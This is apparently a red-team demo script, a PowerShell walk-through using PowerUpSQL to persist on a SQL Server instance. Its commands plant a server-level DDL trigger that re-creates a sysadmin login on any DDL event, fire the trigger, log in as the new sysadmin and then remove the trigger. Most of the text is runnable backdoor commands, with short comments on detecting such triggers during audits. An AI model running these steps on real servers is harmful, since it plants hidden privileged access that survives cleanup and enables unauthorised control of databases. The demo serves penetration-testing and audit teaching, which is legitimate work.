Last active
August 1, 2018 15:51
SQL Server - Persist via DDL Trigger - Demo
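# PowerUpSQL
# SQL Server - Persist via DDL Trigger - Demo
# Note: The assumption is that the connecting Windows user has sysadmin privileges.
#
# The walk-through enumerates server-level DDL triggers, plants a trigger that
# re-creates a sysadmin login, fires it, and then removes it again.
# Defender's view: server-level DDL triggers are listed in sys.server_triggers,
# so the same enumeration used below (Get-SQLTriggerDdl) is how an unexpected
# trigger of this kind is found during an audit.

# Demo values are defined once so every step targets the same instance and login.
# (The original listing created "mysqluser4" but logged in as "mysqluser3".)
$Instance     = 'MSSQLSRV04\SQLSERVER2014'
$DemoLogin    = 'mysqluser4'
# NOTE: a password passed on the command line ends up in console history and in
# any PowerShell transcript / script-block logging; use a throwaway lab value only.
$DemoPassword = 'NewPassword123!'

# Get local instances
Get-SQLInstanceLocal

# Get info for the instance to confirm sysadmin
Get-SQLServerInfo -Verbose -Instance $Instance

# Get list of logins and note the demo login does not exist yet
Get-SQLQuery -Verbose -Instance $Instance -Query "select name from master..syslogins where name like 'mysqluser%'"

# Get list of triggers (baseline before the change)
Get-SQLTriggerDdl -Verbose -Instance $Instance

# Add backdoor trigger to add sysadmin on any DDL event
Get-SQLPersistTriggerDDL -Instance $Instance -NewSqlUser $DemoLogin -NewSqlPass $DemoPassword

# Confirm backdoor trigger was added (compare against the baseline listing above)
Get-SQLTriggerDdl -Verbose -Instance $Instance

# Trip the trigger using any server level event
Get-SQLQuery -Verbose -Instance $Instance -Query "sp_configure 'show advanced options',1;reconfigure"

# Get list of logins; the demo login should now be present
Get-SQLQuery -Verbose -Instance $Instance -Query "select name from master..syslogins where name like 'mysqluser%'"

# Log in using new sysadmin
Get-SQLServerInfo -Verbose -Instance $Instance -Username $DemoLogin -Password $DemoPassword

# Remove trigger, then user can be removed too
# Note: if you do not remove the trigger first, the user will get added back in by the trigger
Get-SQLPersistTriggerDDL -Instance $Instance -NewSqlUser $DemoLogin -NewSqlPass $DemoPassword -Remove

# Confirm backdoor trigger is removed
Get-SQLTriggerDdl -Verbose -Instance $Instance

# Confirm whether the demo login is still present after cleanup.
# NOTE(review): this listing does not show the login itself being dropped - if it
# is still listed here, remove it separately now that the trigger is gone.
Get-SQLQuery -Verbose -Instance $Instance -Query "select name from master..syslogins where name like 'mysqluser%'"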